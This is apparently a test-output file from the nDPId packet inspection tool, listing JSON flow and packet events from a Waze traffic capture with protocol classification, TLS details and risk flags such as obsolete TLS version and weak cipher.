+00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880583,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880583,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880583,"pkt":"ABoRAAACABoRAAABCABFAAAo9fdAAEAGbf4KCAAByKAEMeyeAFAiBCaW3fvegVAR\/\/\/m8gAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1435587880586,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880586,"pkt":"ABoRAAACABoRAAABCABFAAAodU1AABAGHqnIoAQxCggAAQBQ7J7d+96BIgQml1AQ\/\/\/m8gAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1435587880587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880587,"pkt":"ABoRAAACABoRAAABCABFAAAodU5AABAGHqjIoAQxCggAAQBQ7J7d+96BIgQml1AR\/\/\/m8QAA"} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880587,"flow_last_seen":1435587880587,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880587,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1435587880587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880587,"pkt":"ABoRAAACABoRAAABCABFAAAoE7JAAEAGT68KCAAByKAExqhRAbtmrsLcmVFRdFAR\/\/8aBwAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1435587880588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880588,"pkt":"ABoRAAACABoRAAABCABFAAAodU9AABAGHhLIoATGCggAAQG7qFGZUVF0Zq7C3VAQ\/\/8aBwAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1435587880588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880588,"pkt":"ABoRAAACABoRAAABCABFAAAodVBAABAGHhHIoATGCggAAQG7qFGZUVF0Zq7C3VAR\/\/8aBgAA"} 
+00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880589,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880589,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880589,"pkt":"ABoRAAACABoRAAABCABFAAAoS15AAEAGGJgKCAAByKAEMew\/Abump6BqWVh1BVAR\/\/\/VjgAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880589,"pkt":"ABoRAAACABoRAAABCABFAAAodVJAABAGHqTIoAQxCggAAQG77D9ZWHUFpqega1AQ\/\/\/VjgAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880589,"pkt":"ABoRAAACABoRAAABCABFAAAodVNAABAGHqPIoAQxCggAAQG77D9ZWHUFpqega1AR\/\/\/VjQAA"} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587894241,"flow_last_seen":1435587894241,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587894241,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1435587894241,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587894241,"pkt":"ABoRAAACABoRAAABCABFAAA87+5AAEAGZNsKCAABLjOtto0mAbvDfJnqAAAAAKAC\/\/\/\/twAAAgQFtAQCCAoACHYEAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1435587894244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587894244,"pkt":"ABoRAAACABoRAAABCABFAAAodXFAABAGD20uM622CggAAQG7jSY8g2YVw3yZ61AS\/\/86\/gAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1435587894244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587894244,"pkt":"ABoRAAACABoRAAABCABFAAAo7+9AAEAGZO4KCAABLjOtto0mAbvDfJnrPINmFlAQ\/\/86\/wAA"} 
+00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587894241,"flow_last_seen":1435587894323,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587894323,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":537,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587894241,"flow_last_seen":1435587894759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587894759,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587898822,"flow_last_seen":1435587898822,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587898822,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1435587898822,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587898822,"pkt":"ABoRAAACABoRAAABCABFAAA8qMZAAEAGamAKCAABbKiw5MaMAbuJft8IAAAAAKAC\/\/93xAAAAgQFtAQCCAoACHfOAAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1435587898824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587898824,"pkt":"ABoRAAACABoRAAABCABFAAAodXtAABAGzb9sqLDkCggAAQG7xox2gSD3iX7fCVAS\/\/+\/9AAA"} 
+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1435587898824,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587898824,"pkt":"ABoRAAACABoRAAABCABFAAAoqMdAAEAGanMKCAABbKiw5MaMAbuJft8JdoEg+FAQ\/\/+\/9QAA"} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587898822,"flow_last_seen":1435587898874,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1435587898874,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587905035,"flow_last_seen":1435587905035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587905035,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1435587905035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587905035,"pkt":"ABoRAAACABoRAAABCABFAAA82iNAAEAGeqYKCAABLjOtto0pAbvwXaAfAAAAAKAC\/\/\/IZgAAAgQFtAQCCAoACHo8AAAAAAEDAwg="} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1435587905038,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587905038,"pkt":"ABoRAAACABoRAAABCABFAAAodYZAABAGD1guM622CggAAQG7jSkPol\/g8F2gIFAS\/\/86+wAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1435587905039,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587905039,"pkt":"ABoRAAACABoRAAABCABFAAAo2iRAAEAGerkKCAABLjOtto0pAbvwXaAgD6Jf4VAQ\/\/86\/AAA"} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587905035,"flow_last_seen":1435587905111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587905111,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01096{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":580,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587905035,"flow_last_seen":1435587905510,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587905510,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} 
+01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587905035,"flow_last_seen":1435587905565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587905565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880580,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880580,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1435587868632,"flow_last_seen":1435587869162,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1624,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587869162,"flow_last_seen":1435587869302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871656,"flow_last_seen":1435587871946,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871658,"flow_last_seen":1435587871945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} 
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587871941,"flow_last_seen":1435587872478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":552,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872476,"flow_last_seen":1435587872705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1435587872702,"flow_last_seen":1435587872838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":543,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} +00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1435587898822,"flow_last_seen":1435587899372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880579,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880579,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":45169,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 